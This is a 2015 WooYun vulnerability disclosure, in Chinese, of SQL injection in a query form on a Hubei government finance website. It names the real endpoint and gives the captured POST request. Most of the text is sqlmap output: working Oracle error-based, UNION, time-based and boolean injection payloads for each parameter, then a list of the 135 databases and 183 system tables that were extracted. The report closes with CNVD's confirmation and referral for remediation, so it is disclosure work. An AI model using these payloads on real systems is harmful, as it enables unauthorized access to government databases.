乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-24: 细节已通知厂商并且等待厂商处理中 2015-07-29: 厂商已经确认,细节仅向厂商公开 2015-08-08: 细节向核心白帽子及相关领域专家公开 2015-08-18: 细节向普通白帽子公开 2015-08-28: 细节向实习白帽子公开 2015-09-12: 细节向公众公开
最近发现很多POST注入,这就是一个
打开网站
http://www.hbcz.gov.cn
右边栏有查询表单,找到框架url
http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087
填写表单,抓包
POST /XZQHQueryWAR/xxcx/loca_zjxx1.jsp HTTP/1.1Host: www.hbcz.gov.cn:7001Proxy-Connection: keep-aliveContent-Length: 104Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.hbcz.gov.cn:7001User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=ySHDVsvSvqLVhQDxyLSQvJW22DLNQJ2jP7Ln99LnrTC1ntL0gCTM!337724127class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1=++%B2%E9+%D1%AF++
然后跑表,收获不小,所有参数均未过滤
Place: POSTParameter: T2 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=%' AND 1359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (1359=1359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)Place: POSTParameter: class_ssort Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: class_fovo=&class_ssort=%' AND 4861=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (4861=4861) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: class_fovo=&class_ssort=%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||CHR(77)||CHR(101)||CHR(66)||CHR(107)||CHR(89)||CHR(103)||CHR(107)||CHR(89)||CHR(69)||CHR(100)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- Place: POSTParameter: T1 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l%' AND 5974=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5974=5974) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l%' AND 2987=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(84)||CHR(81)||CHR(111),5) AND '%'='&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)Place: POSTParameter: class_fovo Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: class_fovo=%' AND 5602=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5602=5602) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: class_fovo=%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||CHR(107)||CHR(107)||CHR(66)||CHR(89)||CHR(109)||CHR(70)||CHR(83)||CHR(117)||CHR(109)||CHR(112)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- Place: POSTParameter: table Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: class_fovo=&class_ssort=&table=cz_fxgczj' AND 7084=7084 AND 'SglX'='SglX&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [INFERENCE] Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: class_fovo=&class_ssort=&table=cz_fxgczj' AND 6640=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (6640=6640) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND 'KlXg'='KlXg&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= �� ѯ Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)---available databases [135]:[*] CTXSYS[*] D420000[*] D420101[*] D420102[*] D420103[*] D420104[*] D420105[*] D420106[*] D420107[*] D420111[*] D420112[*] D420113[*] D420114[*] D420115[*] D420116[*] D420117[*] D420201[*] D420202[*] D420203[*] D420204[*] D420205[*] D420222[*] D420281[*] D420301[*] D420302[*] D420303[*] D420304[*] D420321[*] D420322[*] D420323[*] D420324[*] D420325[*] D420326[*] D420381[*] D420501[*] D420502[*] D420503[*] D420504[*] D420505[*] D420506[*] D420525[*] D420526[*] D420527[*] D420528[*] D420529[*] D420581[*] D420582[*] D420583[*] D420601[*] D420602[*] D420606[*] D420607[*] D420624[*] D420625[*] D420626[*] D420682[*] D420683[*] D420684[*] D420701[*] D420702[*] D420703[*] D420704[*] D420801[*] D420802[*] D420803[*] D420804[*] D420821[*] D420822[*] D420881[*] D420901[*] D420902[*] D420921[*] D420922[*] D420923[*] D420981[*] D420982[*] D420984[*] D421001[*] D421002[*] D421003[*] D421022[*] D421023[*] D421024[*] D421081[*] D421083[*] D421087[*] D421101[*] D421102[*] D421121[*] D421122[*] D421123[*] D421124[*] D421125[*] D421126[*] D421127[*] D421128[*] D421181[*] D421182[*] D421201[*] D421202[*] D421221[*] D421222[*] D421223[*] D421224[*] D421281[*] D421301[*] D421302[*] D421381[*] D422801[*] D422802[*] D422822[*] D422823[*] D422825[*] D422826[*] D422827[*] D422828[*] D422829[*] D429004[*] D429005[*] D429006[*] D429021[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
往下一层
Database: SYSTEM[183 tables]+-------------------------------+| AQ$_INTERNET_AGENTS || AQ$_INTERNET_AGENT_PRIVS || AQ$_QUEUES || AQ$_QUEUE_TABLES || AQ$_SCHEDULES || BDXZQH || CMS_COUNT || CMS_DM_LMZD || CMS_DM_WZZT || CMS_LM_FDMB || CMS_LM_LM || CMS_LM_LMZD || CMS_STAT || CMS_TEMP || CMS_TEMP2 || CMS_TJ || CMS_USER_GROUP || CMS_USER_GROUP_RULE || CMS_USER_RULE || CMS_USER_USER || CMS_USER_USER_GROUP || CMS_USER_USER_LM || CMS_WZ_WZ || CMS_WZ_WZLMZD || CMS_WZ_WZ_BAK || CMS_WZ_XGWZ || CMS_XT_ZD || CZ_DEPARTMENTS || DDUSER || DEF$_AQCALL || DEF$_AQERROR || DEF$_CALLDEST || DEF$_DEFAULTDEST || DEF$_DESTINATION || DEF$_ERROR || DEF$_LOB || DEF$_ORIGIN || DEF$_PROPAGATOR || DEF$_PUSHED_TRANSACTIONS || DEF$_TEMP$LOB || DWZZB || GUESTBOOK || HELP || LOGMNRC_DBNAME_UID_MAP || LOGMNRC_GSII || LOGMNRC_GTCS || LOGMNRC_GTLO || LOGMNRP_CTAS_PART_MAP || LOGMNRT_MDDL$ || LOGMNR_AGE_SPILL$ || LOGMNR_ATTRCOL$ || LOGMNR_ATTRIBUTE$ || LOGMNR_CCOL$ || LOGMNR_CDEF$ || LOGMNR_COL$ || LOGMNR_COLTYPE$ || LOGMNR_DICTIONARY$ || LOGMNR_DICTSTATE$ || LOGMNR_ERROR$ || LOGMNR_FILTER$ || LOGMNR_HEADER1$ || LOGMNR_HEADER2$ || LOGMNR_ICOL$ || LOGMNR_IND$ || LOGMNR_INDCOMPART$ || LOGMNR_INDPART$ || LOGMNR_INDSUBPART$ || LOGMNR_LOB$ || LOGMNR_LOBFRAG$ || LOGMNR_LOG$ || LOGMNR_OBJ$ || LOGMNR_PARAMETER$ || LOGMNR_PROCESSED_LOG$ || LOGMNR_RESTART_CKPT$ || LOGMNR_RESTART_CKPT_TXINFO$ || LOGMNR_SESSION$ || LOGMNR_SESSION_EVOLVE$ || LOGMNR_SPILL$ || LOGMNR_TAB$ || LOGMNR_TABCOMPART$ || LOGMNR_TABPART$ || LOGMNR_TABSUBPART$ || LOGMNR_TS$ || LOGMNR_TYPE$ || LOGMNR_UID$ || LOGMNR_USER$ || LOGSTDBY$APPLY_MILESTONE || LOGSTDBY$APPLY_PROGRESS || LOGSTDBY$EVENTS || LOGSTDBY$HISTORY || LOGSTDBY$PARAMETERS || LOGSTDBY$PLSQL || LOGSTDBY$SCN || LOGSTDBY$SKIP || LOGSTDBY$SKIP_SUPPORT || LOGSTDBY$SKIP_TRANSACTION || MVIEW$_ADV_AJG || MVIEW$_ADV_BASETABLE || MVIEW$_ADV_CLIQUE || MVIEW$_ADV_ELIGIBLE || MVIEW$_ADV_EXCEPTIONS || MVIEW$_ADV_FILTER || MVIEW$_ADV_FILTERINSTANCE || MVIEW$_ADV_FJG || MVIEW$_ADV_GC || MVIEW$_ADV_INDEX || MVIEW$_ADV_INFO || MVIEW$_ADV_JOURNAL || MVIEW$_ADV_LEVEL || MVIEW$_ADV_LOG || MVIEW$_ADV_OUTPUT || MVIEW$_ADV_OWB || MVIEW$_ADV_PARAMETERS || MVIEW$_ADV_PARTITION || MVIEW$_ADV_PLAN || MVIEW$_ADV_PRETTY || MVIEW$_ADV_ROLLUP || MVIEW$_ADV_SQLDEPEND || MVIEW$_ADV_TEMP || MVIEW$_ADV_WORKLOAD || NSJG || OL$ || OL$HINTS || OL$NODES || QYQK_TMP || REPCAT$_AUDIT_ATTRIBUTE || REPCAT$_AUDIT_COLUMN || REPCAT$_COLUMN_GROUP || REPCAT$_CONFLICT || REPCAT$_DDL || REPCAT$_EXCEPTIONS || REPCAT$_EXTENSION || REPCAT$_FLAVORS || REPCAT$_FLAVOR_OBJECTS || REPCAT$_GENERATED || REPCAT$_GROUPED_COLUMN || REPCAT$_INSTANTIATION_DDL || REPCAT$_KEY_COLUMNS || REPCAT$_OBJECT_PARMS || REPCAT$_OBJECT_TYPES || REPCAT$_PARAMETER_COLUMN || REPCAT$_PRIORITY || REPCAT$_PRIORITY_GROUP || REPCAT$_REFRESH_TEMPLATES || REPCAT$_REPCAT || REPCAT$_REPCATLOG || REPCAT$_REPCOLUMN || REPCAT$_REPGROUP_PRIVS || REPCAT$_REPOBJECT || REPCAT$_REPPROP || REPCAT$_REPSCHEMA || REPCAT$_RESOLUTION || REPCAT$_RESOLUTION_METHOD || REPCAT$_RESOLUTION_STATISTICS || REPCAT$_RESOL_STATS_CONTROL || REPCAT$_RUNTIME_PARMS || REPCAT$_SITES_NEW || REPCAT$_SITE_OBJECTS || REPCAT$_SNAPGROUP || REPCAT$_TEMPLATE_OBJECTS || REPCAT$_TEMPLATE_PARMS || REPCAT$_TEMPLATE_REFGROUPS || REPCAT$_TEMPLATE_SITES || REPCAT$_TEMPLATE_STATUS || REPCAT$_TEMPLATE_TARGETS || REPCAT$_TEMPLATE_TYPES || REPCAT$_USER_AUTHORIZATIONS || REPCAT$_USER_PARM_VALUES || RYQKB || RYQKB_COM || RYQK_TMP || SQLPLUS_PRODUCT_PROFILE || SYDWBZ || SYS_BKJXXB || SYS_USERB || SYS_USERRZ || SYS_USERRZ2 || SYS_ZJSCRZB || TABLESPACE || USERSL || XZDW_TMP || XZJGBZ || ZJXXB |+-------------------------------+
available databases [135]:[*] CTXSYS[*] D420000[*] D420101[*] D420102[*] D420103[*] D420104[*] D420105[*] D420106[*] D420107[*] D420111[*] D420112[*] D420113[*] D420114[*] D420115[*] D420116[*] D420117[*] D420201[*] D420202[*] D420203[*] D420204[*] D420205[*] D420222[*] D420281[*] D420301[*] D420302[*] D420303[*] D420304[*] D420321[*] D420322[*] D420323[*] D420324[*] D420325[*] D420326[*] D420381[*] D420501[*] D420502[*] D420503[*] D420504[*] D420505[*] D420506[*] D420525[*] D420526[*] D420527[*] D420528[*] D420529[*] D420581[*] D420582[*] D420583[*] D420601[*] D420602[*] D420606[*] D420607[*] D420624[*] D420625[*] D420626[*] D420682[*] D420683[*] D420684[*] D420701[*] D420702[*] D420703[*] D420704[*] D420801[*] D420802[*] D420803[*] D420804[*] D420821[*] D420822[*] D420881[*] D420901[*] D420902[*] D420921[*] D420922[*] D420923[*] D420981[*] D420982[*] D420984[*] D421001[*] D421002[*] D421003[*] D421022[*] D421023[*] D421024[*] D421081[*] D421083[*] D421087[*] D421101[*] D421102[*] D421121[*] D421122[*] D421123[*] D421124[*] D421125[*] D421126[*] D421127[*] D421128[*] D421181[*] D421182[*] D421201[*] D421202[*] D421221[*] D421222[*] D421223[*] D421224[*] D421281[*] D421301[*] D421302[*] D421381[*] D422801[*] D422802[*] D422822[*] D422823[*] D422825[*] D422826[*] D422827[*] D422828[*] D422829[*] D429004[*] D429005[*] D429006[*] D429021[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB</code>往下一层
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-29 09:39
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
暂无
